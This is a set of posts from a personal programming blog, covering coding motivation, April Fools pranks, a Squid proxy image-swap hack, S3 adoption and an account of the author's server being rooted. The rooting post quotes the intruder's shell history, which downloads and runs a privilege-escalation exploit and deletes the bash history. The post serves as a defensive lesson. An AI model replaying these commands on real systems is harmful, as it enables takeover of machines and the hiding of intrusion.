Coding to the beat, yo

I Decided to Be a Code Rapper

What’s up, cracker.  Listen to the beat and get the codin’ going.  Feelin’ the keys beneath the fingers.  No time to stop at Wingers, for fries and lies and all the colorful colors.  Gotta get coding, the day is nigh.  When we release, it’s gonna be big, like the kid on a bike riding for the first time.  So no time for the playin’, just get the groove on, get in the zone, hack it out… no talking on the phone.  No meetings are important enough.  We’ve got all the right stuff.  This is what we’ll never forget.  Blow any idea of algorithms out the door, we come up with our own shi’.  I’m not throwin’ a fit.  Stick to the music, the keys, the Code.  That’s what it’s all about, yo!

Bonus Coding

Last weekend I biked my first century.  It was an “easy” course and was supposed to be a beautiful day.  I wasn’t expecting anything to go wrong, but as luck would have it, a lot did.  I struggled to finish.

Looking back, I think there are a few reasons why it wasn’t as easy as I had hoped:

  • I got 5 hours of sleep the night before
  • I didn’t train much
  • I didn’t drink enough water the night/week before
  • I got lost, and ended up biking an extra six miles

Whoa, back up… what was that last one?

“I ended up biking an extra six miles”

I’d like to call these my “bonus miles”.  Even though I went off-course at the time, lost a few minutes off my time, and made the rest of the race a little harder… it forced me to push myself a further, get a better workout, and gave me the confidence that if needed, I can go even further.  It also taught me a valuable lesson – don’t get lost.  So even though it was a short-term loss, it ended up being a long-term gain.

So how does this relate to programming?

Bonus coding.  Sometimes we get lost in what we are programming.  Sometimes it’s a miscommunication.  Sometimes it’s a false assumption.  But often times we find ourselves in a place where we’ve coded for a long amount of time and end up having to throw it all away.  It’s not the best feeling in the world – it actually makes you feel like you’ve just wasted valuable time from your life.  But it’s more than that.  You’ve gained more experience in the wrong way to code.  Like biking, it’s a short-term loss, but a long-term gain.  Just learn from it and try not to repeat the same mistakes.

Just remember in your coding that your career isn’t a sprint, it’s a century – a marathon.  Go at a steady pace, learn from your mistakes, and don’t get yourself down at short-term losses.

Failed Internet April Fools Pranks

It’s another year of the major internet holiday, and once again there’s a lot of half-assed April Fools “Pranks”. This time, however, I decided to compile a list of the ones I saw and explain why they suck.  Most are fake products.  Lots are straight-up marketing.  They’re all stupid.

This is by no means a comprehensive list (that would take way too long), but is just the ones I saw that made me say “lame”.

What Sucks

Google Goes Nuclear” (TechCrunch) - Google to use its own nuclear powerplants.  Nevermind that this was actually published a day early, but the idea is even stupid.  It probably had the same amount of thought as the rest of their posts – about none.

“Store Anything In Google Docs” (Google) - Put your apartment in Google docs.  Ok, it probably took about 2 minutes to think of the idea, another 5 to write down some “user reviews”.  There was absolutely no planning involved, and I doubt it tricked anyone.  If I wanted to read crap like this, I’d read theonion.

“iCade” (ThinkGeek) - While this one is actually believable, it still falls short of Fooling anyone.  Does it make anyone look stupid?  Nope, just Apple.  This “prank” was designed just to get traffic to the site (by targeting a high-profile item like the iPad), and is not clever in any way.  Props do go out to actually making an arcade and taking pictures.  Again, if I wanted crap like this, I’d read theonion.

Hulu Confidential” (Hulu) - Hulu exposes their “Alien Plot”.  While the video production is quality, and it is an interesting plot, this was 100% designed by their marketing department (and it shows).  This could have been released any day of the year and nobody would have known the difference.

(for more check out

The Good Stuff

There were a few that I actually got a good chuckle at:

4chan” (4chan) - They just tweeted about 4chan 2.0.  This was great – what a way to poke fun at the rest of the internet.  Everyone thinks that Facebook Connect is a key to unlocking additional content, which facilitates additional revenue, etc, etc.  4chan is proof that thriving communities can and do still exist in a way that doesn’t directly correlate to revenue, and all the web 2.0’s and tight integration with social networks is complete BS.  I love it.

Admin For A Day” (reddit) - Reddit made it appear that there was a code glitch that allowed everyone to have admin rights.  This actually took some foresight and programming, and doesn’t appear to directly tie to traffic/revenue.  It’s just good old-fashioned fun.

Command-line website” (xkcd) - Browsing the site through the command-line… absolutely brilliant.

If it weren’t for these 3 sites, my April Fools would have been a waste.  Thanks guys.

April Fools Prank – Changing Images With Squid

Well, that time is upon us… time for April Fools.  I’m not very good at coming up with good pranks, but a friend of mine, Chris Alef, gave me a great idea: swap all the product images on for pictures of our management, provided at

Pretty simple, and funny idea, but how do you make it work?  It was a lot easier than I thought.  The first idea was to use a proxy, and route all traffic from the office through the proxy.  That seemed less than ideal – if the proxy went down, so would everyones web access.  Orders would stop shipping, buyers would stop buying, and I would be in a lot of trouble.  There had to be a less risky way to do it.  Well, our images (all static content I guess) are hosted on  Limited to a single domain, eh?  We have an internal DNS, so if we could get to just be a proxy, changing only a few images, we could just update the dns to use the proxy.  Brilliant!

I started up an EC2 instance of Ubuntu, installed squid, and started configuring it.  I followed relatively the same pattern as the Upside-Down-Ternet, using a redirector.  In all, these are the configs I changed/used in /etc/squid/squid.conf:

redirect_children 20
http_access2 allow all
http_port 80 accel vport=80
cache_peer parent 80 0 no-query originserver

where is the origin server (what to proxy), and /tmp/ is the redirector.  Without the redirector, this would be a completely transparent proxy to static content.  Now, the redirector code:



@images = (

while (<>) {
  my $tmp = $_;
  if ($tmp =~ /images\/items\/medium/) {
    print $images[int rand(scalar @images )] . "\n";
  else {
    print $tmp;

Restart squid, and done! Now just test it by updating your /etc/hosts to add the ip of the proxy and Behold, the result:

"Jill looks good, doesn't she?"

I ended up not doing it. I really didn’t feel it was worth losing my job by messing up. If I could have found a better way to do it than updating the DNS, even the internal one, I would have done it. But it was just too risky at my company. Oh well, now you all know how to do it :)

The Site Was R00ted

As you might know, there was a little bit of downtime… from December 28 to January 6th.  First of all, sorry about that… I was doing a bunch of holiday stuff.  At any rate, when I noticed the EC2 instance was unresponsive, I figured it was the fault of EC2.  So, I just rebooted the instance and went on my merry way.

Flash forward to today.  I got on my box to do some maintenance, and saw the following warning:

~/tmp$ ls
> ls: unrecognized prefix: do
> ls: unparsable value for LS_COLORS environment variable.

“Well that’s weird”, I thought to myself.  I googled around the internet, and came to the conclusion I’d been rooted.  Turns out, I was right.

Mistake #1

Now comes the fun part of all of these.  I had to track down just *how* it happened.  First thing that I did was went to /var/log/auth.log.  I see brute force attacks all the time, and it totally fills up the logs, so I went to when made the most sense — around the time the site when down.  That’s when I noticed this entry:

Dec 28 14:03:25 ip-10-251-69-178 sshd[13661]: Accepted password for deploy from port 2608 ssh2
Dec 28 14:03:25 ip-10-251-69-178 sshd[13661]: pam_unix(sshd:session): session opened for user deploy by (uid=0)


I had forgotten I created a mostly temporary user named “deploy” with a weak password (umm… “deploy”).  I thought it would be ok since that user had very little permissions — files I didn’t care about, no sudo access, etc.  Boy, was I wrong.  Which brings me to…

Mistake #2

Everyone always says keep your system up to date.  I also think it’s a good practice.  But do I?  Of course not.  I was using an outdated (non-updated) version of Ubuntu 8.10.  Put yourself in the hax0rs shoes: if you were breaking into a box, had user access, the os was out of date, and you wanted root, how would you do it?  A rootkit, of course!  And that’s exactly what happened…

uname -a
sudo su
ls -a
cat .bash_history
cat /proc/cpuinfo
cat /etc/issue
cat /etc/hosts
wget;tar zxvf l3.tar.gz;cd linux-sendpage3;chmod 777 *;./run;id
ls -a
rm -rf .bash_history
wget;tar zxvf l3.tar.gz;cd linux-sendpage3;chmod 777 *;./run;id
sudo su -

A little sidenote… if he removed the bash_history, how did I get this command history?  Look closely… whatever script it was, it “cd”ed into the linux-sendpage3 directory before it rm’ed the bash_history.  Sucka  :) .  Anyways, there’s the rootkit, and him logging in as root with “sudo su -”.

He was root.  OMG!

The next part seems kind of fuzzy to me as to what he did.  I didn’t have any logs (root’s bash_history was clean), and there were no logs anywhere else on the system.  What I did have was one thing: ls was acting funky.  Surely he replaced it, so at least it would be a start.  Upon further inspection, it was owned by the user 122, and group messagebus.  Well, at least that’s a start!

root@ip-10-251-69-178:~/bin# find / -user 122

It looks like he changed a bunch of important files here, he certainly didn’t want me snooping into what he was doing.  Those modifications hid all the files and processes he was using, of course.  So my next step was to restore those files so I could dig deeper into what was going on.  With EC2, that’s a piece of cake — I fired up another Ubuntu 8.10 ami, and copied over the binaries.  Here’s where I got bottlenecked… I was getting some silly “Permission denied” error, even though I was root!  lsattr to the rescue.

root@ip-10-251-69-178:~/bin# lsattr /bin/ls
s---ia------------- /bin/ls

Super-secret permissions!  no!

root@ip-10-251-69-178:~/bin# chattr -sia /bin/ls; mv /tmp/ls.fix /bin/ls

Whew, that was a close one.

Next, I ran the ‘find’ command to see if other files had shown up, and indeed they did.  Two directories — “/usr/lib/libsh” and “/lib/” were owned by this guy.  There were a few utility scripts in these directories to clean logs and such, and also some program named mirkforce — which looks like some irc bot.  So, all of this for some stupid script kiddie?  Augh, lame.

There were two other things that I got bored with and didn’t look into anymore — a crontab as root that executed “/dev/s/y2kupdate >/dev/null” every minute (thanks for keeping my computer updated), and some dbus process that hogged a bunch of resources.

At any rate, there were two things that came out of this:

  1. Don’t use easy passwords.  Ever.
  2. Keep your systems up-to-date.

I’m sure this entire thing was automated, so I didn’t fear stolen information so much (not that there was any to give).  He left all my data in place, so I just ditched the whole box, fired up another EC2 instance, and was running on a fresh install of Ubuntu 9.10 in about 10 minutes.  Amazon  Web Services win again!

Programming as a Form of Self-Expression

I just got back form Elton John and Billy Joel, and while I was there it reminded me of something I’ve been thinking about for quite a while. Programming as an art form. I get a lot of inspiration from the arts — actually I first started thinking about this back in December when I went to “A Jon Schmidt Christmas”. I thought… this guy doesn’t have a chance to “make it big”, but he’s completely happy where he’s at. If he played in front of 10 people, he would be completely happy. Take that to Elton John and Billy Joel, and I think the same goes for them. They’re getting older. They don’t have to play music. But they do. They love to do it, they’re good at it, and that’s what makes them happy. So my question is, why can’t computer engineers do that? Are we really so technical, digging into the details, gathering requirements, making estimations, doing test-driven development, that we can’t express ourselves through code? Well, I think we can.

This might be where frameworks like Django and Ruby on Rails come into play.  They allow you to make what you want, without the crap.  When you have an idea, you can make it.  You can express your ideas quickly and easily.  You don’t worry about design patterns, because it’s all there for you.  All that’s left to you is to “paint the picture”.  Just hack it out, it doesn’t matter what the code looks like.  Take a look at the most “artistic” programmers out there — the hax0rs of the world.  Many of them are absolutely brilliant… but you wouldn’t think so in looking at their code.  Heck, most of them don’t program object-orientedly — a must in the business world.  They hack out a script that just does the job, and nothing more.  I wouldn’t say that’s a bad thing.  It does what it’s supposed to.  What more is needed?

At any rate, I think that the longer I’m a programmer by profession, the further I get away artistic expression in programming.  While I don’t think that “hacking out a solution” is a good idea for a business, I still think programmers need to do the quick hacks on their own, and make some that actually *does* something, with minimal effort.  I want to be like Billy Joel when I get old and still be killing it when I’m 60, or be like one of my personal heroes, Woz.  I don’t have the answer for how to get an old-timer like myself excited about that kind of thing, but when you figure it out let me know.

“No We Can’t”: Engineers Today Are Lazy

Some coworkers and myself had a nice discussion over dinner tonight about how things have changed over time.  More particularly, we talked about the wildly popular game “Duck Hunt”.  Yes, the Nintendo one.  How in the world does that thing work?  After some discussion, Nate Brunson finally whipped out his iPhone and came across this article detailing how Duck Hung works.  It’s all pretty interesting stuff, and it was all done way before its day.

But Nintendo wasn’t Agile!

The thing is, if Nintendo were made in the “agile” world of today, would it have been released with Duck Hunt?  Would Duck Hunt ever had existed?  My inclination is no.  It would have been labeled as “too much scope for the first increment, we should release Mario Brothers, analyze the results, and go from there”.  Immediately following Mario Brothers, which would be a hit (obviously), they would follow up with Mario Bros 2, because hey, the first one did well.  After 2, the third increment would be… (surprise) Mario Bros 3.  Eventually the idea of Duck Hunt would have been forgotten.

If you want to change the world, don’t wait until the next increment

The point is that sometimes innovation comes at a cost.  You can’t always slim down functionality to meet a deadline, and still expect to be innovative.  If there is an incredible idea out there to be had, even if you’re not sure what kind of time it will take, resources need to be devoted, or even if it’s possible, you still need to just go for it.

Where did we go wrong?

Why are we so afraid to just get things done?  I personally thinks it comes down to people not wanting accountability, or they want to be absolutely positive that they can do what they say.  They are afraid to stretch themselves.  They really don’t care about being innovative.  They care about the business, about money, and about following a “standard procedure” or “following the most effective way of doing something”.  Seth Godin is very popular and incredibly successful because he gives people the magic formula to creating a good product.  The only problem is that he doesn’t do it for you.  I’m not saying processes are a bad thing, I’m just saying that eventually some crazy guy needs to sit down, do the impossible, and get it done.  Don’t believe me?  How about the names Steve Wozniak, Ed Logg, or Brad Fitzpatrick?  Chew on them apples….

Thought: Staying Motivated With a Personal Project

I’ve had a lot of thought and conversation lately about how to stay motivated.  The fact is that we’re all human, and we all have ups and downs.  Even if your super-motivated about doing something one day, the next day you might not be.  I know I’ve had a lot of personal experiences where I get on a kick for a couple days, hammer out some code, then someone says “eh, that sucks”.  It’s a total downer!  Well, here are a few tactics you can try to stay motivated.

  • Don’t listen to what other people say about your stuff, unless it will help make it better or point out an obvious flaw.
  • Remember that if someone has feedback, that usually means you need to do something.
  • If you work on something a while and become disinterested, keep what you’ve done around.  Who knows, you may pick it up and continue working on it several months down the road.
  • Finish things through to completion

I think the last point is the most important.  As software developers, we become distracted very easily.  Often times we become to entranced by every new technology and every different way to do things that we don’t ever get a finished product.  The old tale that “an application is never finished” has put a bad taste in my mouth since the first time I heard it.  While there’s always room for improvement, finishing and releasing a product, and setting milestones for future work to be done is vital.  Working in bigger companies we sometimes forget that – that’s why there are project managers, product managers, etc etc.  We could learn a thing or two from those guys and apply it to our own side projects.

Aside from the “setting goals” part, most of the work happens within a very small timeframe.  It’s called being “in the zone”.  That’s the programmers time when you are completely focused on the task at hand, and cannot be distracted by anything.  This is the most important time to keep programming.  If you have to stay up all night, then  do it.  Here’s what Joel Spolsky (who I normally read for entertainment, not how to do my job - for another post… but this is good) has to say about being “in the zone”:

“Here’s the trouble. We all know that knowledge workers work best by getting into “flow”, also known as being “in the zone”, where they are fully concentrated on their work and fully tuned out of their environment. They lose track of time and produce great stuff through absolute concentration. This is when they get all of their productive work done. Writers, programmers, scientists, and even basketball players will tell you about being in the zone. The trouble is, getting into “the zone” is not easy. When you try to measure it, it looks like it takes an average of 15 minutes to start working at maximum productivity. Sometimes, if you’re tired or have already done a lot of creative work that day, you just can’t get into the zone and you spend the rest of your work day fiddling around, reading the web, playing Tetris.”

If you only have time once a week to get “in the zone”, then plan it.  Turn off your cell phone, close your IMs, tell your wife you love her and won’t see her for bit, and set the expectation that, for example, every Thursday night you’ll be hacking away and completely unavailable.  Try to know what “business decisions”, or functionality you want to include beforehand.  I think about it when I’m trying to get to sleep at night, taking a shower, eating breakfast, whatever.  I try to write down what I think of the next chance I get.  But when it come to getting it done, that’s when that night of being alone is vital.

This was kind of a hacked out, not-completely-thought-out thought, I will hopefully try to organize it a bit better and follow up in another blog post, but this is just what I’ve been thinking about.  As always, your opinions and insights are appreciated, whether it’s through email or a comment.

S3 at a Real-world Company

Let’s face it, most bigger companies nowdays are afraid of trying something new.  That happens with good reason – most new ideas tend to fall by the wayside, as trends normally do, and companies like to play it as safe as possible.  I see new ideas and frameworks popping up all over the Twittersphere every day, and I wouldn’t consider using any of them in a production environment.

Amazon Web Services Isn’t Just a Pie-In-The-Sky

The reason I bring this up is this – Amazon Web Services in the business (not startup) world is still considered a new, unproven technology.  And with all the marketing hype around clouds, infinitely scalable services, etc, etc, I honestly don’t blame them.  It hard to believe a pie-in-the-sky promise.  That’s just the point – AWS is not pie in the sky, and people that think it is need to dig deeper and understand what it is and what it offers.  The fact is that Amazon Web Services has been around since 2002, and has uptime that is most likely better than your data center.  Coincidentally, Amazon also knows this and is trying to eliminate the false perception that IT IS GOOD FOR YOUR COMPANY TO USE IT TOO.  They published this article, along with an updated cost calculator and an Excel spreadsheet to compare your datacenter with using AWS. and S3

Ok, so the real reason for this article.  At, we try hard to stay as close as we can to the bleeding edge, but going into “the cloud” has always received serious backlash.  That is, until recently.  Earlier this month we took advantage of the cloud for the first time in a production environment: by using S3 for our “Jumbo” product images.

First, let me explain the reasons we decided to use S3.  Our webapp tier, consisting of a few boxes, hosts the Interchange e-commerce framework, and also contains all our static content.  The trouble was, the 900x900 images consumed about 100gb disk space, but each box only had less than 20gb left.  That left us with one of two traditional options: put new hard disks in each webapp, or use our NetApp to host the images from a single location.  Neither seemed ideal, since putting in new hard disks would be pricey and could take some time, and we were already short on NetApp space given the current budget.  I had done some side-work using S3, and mentioned it.   Chris Alef was able to push the decision as a great idea and it was agreed to do it.

Flash forward 1 week, and we were ready to go live.  We were able to convert and upload the 900x900 images to S3 over the weekend, and get the UI in place in no-time flat.  We have Akamai hosting edge cache in front of S3, and we had zero problems since launch last month.  I asked our operations team what they thought the bill for the month would be, and they guessed $4,000.  The actual bill?  Under $50.  Granted, Akamai probably took most of the traffic, but that’s still mighty impressive.

There’s so much more we can do with AWS, and I hope this is just the start.  I hope to be able to take advantage of other AWS services such as EC2 and SQS in the future, and I think S3 helped build confidence.  AWS is a service that can be relied on for both startups and established internet businesses alike.

YUI-Magnifier Released

A coworker of mine, Dustin McQuay, released the YUI Magnifier, a YUI implementation of other popular image zoom utilities.   We were actually surprised to see that nothing else like it already existed for YUI, so Dustin took the challenge of building his own, with the hopes that it might be included in other larger YUI libraries.

It boasts the features:

  • Display a magnified portion of an image, which is controlled by where the mouse is hovering over the image
  • Control over styling
  • Control over location of magnification lens
  • Magnified image can be wrapped by a larger element

Though the release wasn’t very public, it was still quite an accomplishment. It happens to be one of the first open-source releases from (preceded to my knowledge by only Bucardo, a Postgres replication application written for by Endpoint).  It was originally designed to be used for our 900x900 images, but got cut after development has essentially finished due to changed requirements.

It’s a pretty solid application, and hopefully the start of more open source to be coming out of